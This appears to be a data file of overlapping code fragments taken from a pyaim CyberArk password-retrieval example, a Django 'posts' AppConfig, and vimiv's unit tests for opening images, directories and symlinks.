"#!/usr/bin/env python3 from pyaim import CCPPasswordRESTSecure aimccp = CCPPasswordRESTSecure('https://cyberark.dvdangelo33.dev/', \"clientcert.pem\", verify=True) r =",
"from pyaim import CCPPasswordRESTSecure aimccp = CCPPasswordRESTSecure('https://cyberark.dvdangelo33.dev/', \"clientcert.pem\", verify=True) r = aimccp.GetPassword(appid='pyAIM',safe='D-AWS-AccessKeys',username='AnsibleAWSUser') print(r)",
"python3 from pyaim import CCPPasswordRESTSecure aimccp = CCPPasswordRESTSecure('https://cyberark.dvdangelo33.dev/', \"clientcert.pem\", verify=True) r = aimccp.GetPassword(appid='pyAIM',safe='D-AWS-AccessKeys',username='AnsibleAWSUser')"
] |
[
"PostsConfig(AppConfig): ''' :type name: str :type verbose_name: str ''' name = 'posts' verbose_name",
"Post application module. ''' from django.apps import AppConfig class PostsConfig(AppConfig): ''' :type name:",
"''' :type name: str :type verbose_name: str ''' name = 'posts' verbose_name =",
":type name: str :type verbose_name: str ''' name = 'posts' verbose_name = 'Posts'",
"class PostsConfig(AppConfig): ''' :type name: str :type verbose_name: str ''' name = 'posts'",
"module. ''' from django.apps import AppConfig class PostsConfig(AppConfig): ''' :type name: str :type",
"import AppConfig class PostsConfig(AppConfig): ''' :type name: str :type verbose_name: str ''' name",
"from django.apps import AppConfig class PostsConfig(AppConfig): ''' :type name: str :type verbose_name: str",
"AppConfig class PostsConfig(AppConfig): ''' :type name: str :type verbose_name: str ''' name =",
"application module. ''' from django.apps import AppConfig class PostsConfig(AppConfig): ''' :type name: str",
"''' from django.apps import AppConfig class PostsConfig(AppConfig): ''' :type name: str :type verbose_name:",
"django.apps import AppConfig class PostsConfig(AppConfig): ''' :type name: str :type verbose_name: str '''",
"''' Post application module. ''' from django.apps import AppConfig class PostsConfig(AppConfig): ''' :type"
] |
[
"expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_whitespace(self): \"\"\"Open an image with whitespace and symlink in",
"\"arch-logo.png\", \"arch_001.jpg\", \"directory\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self):",
"with a directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd()) expected_files = [\"animation\", \"arch-logo.png\",",
"expected_images = [\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"] for image in [os.path.abspath(im) for",
"ft=python fileencoding=utf-8 sw=4 et sts=4 \"\"\"Test the opening of different file-types with vimiv.\"\"\"",
"self.vimiv.get_paths()) def test_opening_with_whitespace(self): \"\"\"Open an image with whitespace and symlink in directory.\"\"\" expected_dir",
"self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_whitespace(self): \"\"\"Open an image with whitespace and symlink in directory.\"\"\"",
"vimiv_testcase import VimivTestCase class OpeningTest(VimivTestCase): \"\"\"Open with different file-types Test.\"\"\" @classmethod def setUpClass(cls):",
"[os.path.abspath(image) for image in expected_images] for image in [os.path.abspath(im) for im in expected_images]:",
"[os.path.abspath(image) for image in expected_images] self.assertEqual(expected_images, self.vimiv.get_paths()) def test_opening_recursively(self): \"\"\"Open all images recursively.\"\"\"",
"recursively.\"\"\" # Need to backup because we init in the wrong directory here",
"file-types Test.\"\"\" @classmethod def setUpClass(cls): cls.init_test(cls) def test_opening_with_directory(self): \"\"\"Opening with a directory.\"\"\" expected_dir",
"setUpClass(cls): cls.init_test(cls) def test_opening_with_directory(self): \"\"\"Opening with a directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir,",
"self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self): \"\"\"Open with an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) #",
"expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images",
"Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\",",
"expected_images = [\"symlink with spaces .jpg\"] expected_images = [os.path.abspath(image) for image in expected_images]",
"with vimiv.\"\"\" import os from unittest import main from vimiv_testcase import VimivTestCase class",
"\"\"\"Open all images recursively.\"\"\" # Need to backup because we init in the",
"main from vimiv_testcase import VimivTestCase class OpeningTest(VimivTestCase): \"\"\"Open with different file-types Test.\"\"\" @classmethod",
"expected_images] for image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_whitespace(self):",
"the wrong directory here working_dir = self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths()))",
"self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"] expected_images = [os.path.abspath(image)",
"[\"animation\", \"arch-logo.png\", \"arch_001.jpg\", \"directory\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def",
"from unittest import main from vimiv_testcase import VimivTestCase class OpeningTest(VimivTestCase): \"\"\"Open with different",
"directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd()) expected_files = [\"animation\", \"arch-logo.png\", \"arch_001.jpg\", \"directory\",",
"self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_symlink(self): \"\"\"Open with a symlink to an image.\"\"\" expected_dir =",
"different file-types Test.\"\"\" @classmethod def setUpClass(cls): cls.init_test(cls) def test_opening_with_directory(self): \"\"\"Opening with a directory.\"\"\"",
"in directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with spaces .jpg\"]) # Check moving and",
"\"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"] for image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image,",
"expected_dir = os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with spaces .jpg\"]) # Check moving and image population",
"in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_symlink(self): \"\"\"Open with a symlink to an image.\"\"\"",
"with spaces .jpg\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images =",
"\"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self): \"\"\"Open with an image.\"\"\" expected_dir =",
"and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink with spaces .jpg\"] expected_images =",
"\"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self): \"\"\"Open with an image.\"\"\"",
"os.getcwd()) expected_images = [\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"] for image in [os.path.abspath(im)",
"directory here working_dir = self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset() self.working_directory",
"unittest import main from vimiv_testcase import VimivTestCase class OpeningTest(VimivTestCase): \"\"\"Open with different file-types",
"working_dir = self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset() self.working_directory = working_dir",
"self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink with spaces .jpg\"] expected_images = [os.path.abspath(image) for image",
"file-types with vimiv.\"\"\" import os from unittest import main from vimiv_testcase import VimivTestCase",
"len(self.vimiv.get_paths())) self.settings.reset() self.working_directory = working_dir def tearDown(self): self.vimiv.quit() os.chdir(self.working_directory) if __name__ == \"__main__\":",
"<reponame>karlch/vimiv # vim: ft=python fileencoding=utf-8 sw=4 et sts=4 \"\"\"Test the opening of different",
"expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd()) expected_files = [\"animation\", \"arch-logo.png\", \"arch_001.jpg\", \"directory\", \"symlink_to_image\",",
"os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink_to_image\",",
"import VimivTestCase class OpeningTest(VimivTestCase): \"\"\"Open with different file-types Test.\"\"\" @classmethod def setUpClass(cls): cls.init_test(cls)",
"os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset() self.working_directory = working_dir def tearDown(self): self.vimiv.quit()",
"values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset() self.working_directory = working_dir def tearDown(self): self.vimiv.quit() os.chdir(self.working_directory) if __name__",
"a directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd()) expected_files = [\"animation\", \"arch-logo.png\", \"arch_001.jpg\",",
"for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_whitespace(self): \"\"\"Open an image with whitespace",
"image with whitespace and symlink in directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with spaces",
"\"arch_001.jpg\", \"directory\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self): \"\"\"Open",
"# Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\",",
".jpg\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink with",
"def setUpClass(cls): cls.init_test(cls) def test_opening_with_directory(self): \"\"\"Opening with a directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"])",
"\"\"\"Open with an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check moving and image",
"and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"]",
"population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"] expected_images =",
"\"arch-logo.png\"] for image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_symlink(self):",
"self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self): \"\"\"Open with an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\")",
"an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check moving and image population self.assertEqual(expected_dir,",
"wrong directory here working_dir = self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset()",
"def test_opening_with_symlink(self): \"\"\"Open with a symlink to an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"])",
"self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset() self.working_directory = working_dir def tearDown(self):",
"symlink to an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check moving and image",
"we init in the wrong directory here working_dir = self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"],",
"OpeningTest(VimivTestCase): \"\"\"Open with different file-types Test.\"\"\" @classmethod def setUpClass(cls): cls.init_test(cls) def test_opening_with_directory(self): \"\"\"Opening",
"self.init_test([\"vimiv/testimages/directory/symlink with spaces .jpg\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images",
"self.settings.reset() self.working_directory = working_dir def tearDown(self): self.vimiv.quit() os.chdir(self.working_directory) if __name__ == \"__main__\": main()",
"os.getcwd()) expected_images = [\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"] expected_images = [os.path.abspath(image) for",
"[\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"] expected_images = [os.path.abspath(image) for image in expected_images]",
"self.assertEqual(expected_images, self.vimiv.get_paths()) def test_opening_recursively(self): \"\"\"Open all images recursively.\"\"\" # Need to backup because",
"\"arch_001.jpg\"] expected_images = [os.path.abspath(image) for image in expected_images] for image in [os.path.abspath(im) for",
"backup because we init in the wrong directory here working_dir = self.working_directory os.chdir(\"vimiv/testimages\")",
"= [\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"] expected_images = [os.path.abspath(image) for image in",
"\"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"] expected_images = [os.path.abspath(image) for image in expected_images] for image",
"image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_whitespace(self): \"\"\"Open an",
"\"\"\"Open an image with whitespace and symlink in directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink",
"init in the wrong directory here working_dir = self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"])",
"\"\"\"Open with a symlink to an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check",
"an image with whitespace and symlink in directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with",
"image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"] expected_images",
"@classmethod def setUpClass(cls): cls.init_test(cls) def test_opening_with_directory(self): \"\"\"Opening with a directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\")",
"\"directory\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self): \"\"\"Open with",
"= self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset() self.working_directory = working_dir def",
"in expected_images] for image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def",
"different file-types with vimiv.\"\"\" import os from unittest import main from vimiv_testcase import",
"population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink with spaces .jpg\"] expected_images = [os.path.abspath(image) for",
"sts=4 \"\"\"Test the opening of different file-types with vimiv.\"\"\" import os from unittest",
"[os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_symlink(self): \"\"\"Open with a symlink",
"import main from vimiv_testcase import VimivTestCase class OpeningTest(VimivTestCase): \"\"\"Open with different file-types Test.\"\"\"",
"test_opening_with_directory(self): \"\"\"Opening with a directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd()) expected_files =",
"self.assertEqual(expected_dir, os.getcwd()) expected_files = [\"animation\", \"arch-logo.png\", \"arch_001.jpg\", \"directory\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files,",
"expected_files = [\"animation\", \"arch-logo.png\", \"arch_001.jpg\", \"directory\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus())",
"image in expected_images] for image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths())",
"image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd())",
"because we init in the wrong directory here working_dir = self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"],",
"[os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_whitespace(self): \"\"\"Open an image with",
"= [\"animation\", \"arch-logo.png\", \"arch_001.jpg\", \"directory\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible())",
"expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images",
"with an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check moving and image population",
"of different file-types with vimiv.\"\"\" import os from unittest import main from vimiv_testcase",
"with spaces .jpg\"] expected_images = [os.path.abspath(image) for image in expected_images] self.assertEqual(expected_images, self.vimiv.get_paths()) def",
"\"\"\"Test the opening of different file-types with vimiv.\"\"\" import os from unittest import",
"an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check moving and image population self.assertEqual(expected_dir,",
"os.getcwd()) expected_files = [\"animation\", \"arch-logo.png\", \"arch_001.jpg\", \"directory\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files)",
"import os from unittest import main from vimiv_testcase import VimivTestCase class OpeningTest(VimivTestCase): \"\"\"Open",
"# Need to backup because we init in the wrong directory here working_dir",
"os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with spaces .jpg\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd())",
"to an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check moving and image population",
"self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self): \"\"\"Open with an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check",
"self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink_to_image\", \"vimiv.bmp\",",
"\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"] for image in [os.path.abspath(im) for im in expected_images]:",
"expected_images] self.assertEqual(expected_images, self.vimiv.get_paths()) def test_opening_recursively(self): \"\"\"Open all images recursively.\"\"\" # Need to backup",
"spaces .jpg\"] expected_images = [os.path.abspath(image) for image in expected_images] self.assertEqual(expected_images, self.vimiv.get_paths()) def test_opening_recursively(self):",
"[\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"] for image in [os.path.abspath(im) for im in",
"with a symlink to an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check moving",
"test_opening_with_whitespace(self): \"\"\"Open an image with whitespace and symlink in directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages/directory/\")",
"in expected_images] self.assertEqual(expected_images, self.vimiv.get_paths()) def test_opening_recursively(self): \"\"\"Open all images recursively.\"\"\" # Need to",
"os from unittest import main from vimiv_testcase import VimivTestCase class OpeningTest(VimivTestCase): \"\"\"Open with",
"for image in expected_images] for image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image,",
"= [os.path.abspath(image) for image in expected_images] self.assertEqual(expected_images, self.vimiv.get_paths()) def test_opening_recursively(self): \"\"\"Open all images",
"here working_dir = self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset() self.working_directory =",
"im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_whitespace(self): \"\"\"Open an image with whitespace and",
".jpg\"] expected_images = [os.path.abspath(image) for image in expected_images] self.assertEqual(expected_images, self.vimiv.get_paths()) def test_opening_recursively(self): \"\"\"Open",
"with different file-types Test.\"\"\" @classmethod def setUpClass(cls): cls.init_test(cls) def test_opening_with_directory(self): \"\"\"Opening with a",
"self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd()) expected_files = [\"animation\", \"arch-logo.png\", \"arch_001.jpg\", \"directory\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"]",
"= [\"symlink with spaces .jpg\"] expected_images = [os.path.abspath(image) for image in expected_images] self.assertEqual(expected_images,",
"os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"arch_001.jpg\",",
"# Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\",",
"opening of different file-types with vimiv.\"\"\" import os from unittest import main from",
"def test_opening_with_image(self): \"\"\"Open with an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check moving",
"\"vimiv.tiff\", \"arch-logo.png\"] for image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def",
"expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self): \"\"\"Open with an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"])",
"= os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images =",
"expected_images = [os.path.abspath(image) for image in expected_images] for image in [os.path.abspath(im) for im",
"population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"] for image",
"expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_symlink(self): \"\"\"Open with a symlink to an image.\"\"\" expected_dir",
"in the wrong directory here working_dir = self.working_directory os.chdir(\"vimiv/testimages\") self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8,",
"and symlink in directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with spaces .jpg\"]) # Check",
"Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink with spaces .jpg\"]",
"to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset() self.working_directory = working_dir def tearDown(self): self.vimiv.quit() os.chdir(self.working_directory) if",
"\"\"\"Opening with a directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd()) expected_files = [\"animation\",",
"VimivTestCase class OpeningTest(VimivTestCase): \"\"\"Open with different file-types Test.\"\"\" @classmethod def setUpClass(cls): cls.init_test(cls) def",
"expected_images = [\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"] expected_images = [os.path.abspath(image) for image",
"im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_symlink(self): \"\"\"Open with a symlink to an",
"self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"arch_001.jpg\", \"symlink_to_image\",",
"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4 \"\"\"Test the opening of different file-types",
"self.init_test([\".\"], to_set=[\"recursive\"], values=[\"true\"]) self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset() self.working_directory = working_dir def tearDown(self): self.vimiv.quit() os.chdir(self.working_directory)",
"cls.init_test(cls) def test_opening_with_directory(self): \"\"\"Opening with a directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd())",
"[\"symlink with spaces .jpg\"] expected_images = [os.path.abspath(image) for image in expected_images] self.assertEqual(expected_images, self.vimiv.get_paths())",
"test_opening_recursively(self): \"\"\"Open all images recursively.\"\"\" # Need to backup because we init in",
"= [\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"] for image in [os.path.abspath(im) for im",
"test_opening_with_symlink(self): \"\"\"Open with a symlink to an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) #",
"image in expected_images] self.assertEqual(expected_images, self.vimiv.get_paths()) def test_opening_recursively(self): \"\"\"Open all images recursively.\"\"\" # Need",
"moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink with spaces .jpg\"] expected_images",
"spaces .jpg\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink",
"image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd())",
"et sts=4 \"\"\"Test the opening of different file-types with vimiv.\"\"\" import os from",
"vimiv.\"\"\" import os from unittest import main from vimiv_testcase import VimivTestCase class OpeningTest(VimivTestCase):",
"with whitespace and symlink in directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with spaces .jpg\"])",
"Test.\"\"\" @classmethod def setUpClass(cls): cls.init_test(cls) def test_opening_with_directory(self): \"\"\"Opening with a directory.\"\"\" expected_dir =",
"test_opening_with_image(self): \"\"\"Open with an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/arch_001.jpg\"]) # Check moving and",
"in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_symlink(self): \"\"\"Open with a",
"for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_symlink(self): \"\"\"Open with a symlink to",
"# Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink with spaces",
"image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink with spaces .jpg\"] expected_images = [os.path.abspath(image)",
"whitespace and symlink in directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with spaces .jpg\"]) #",
"sw=4 et sts=4 \"\"\"Test the opening of different file-types with vimiv.\"\"\" import os",
"os.getcwd()) expected_images = [\"symlink with spaces .jpg\"] expected_images = [os.path.abspath(image) for image in",
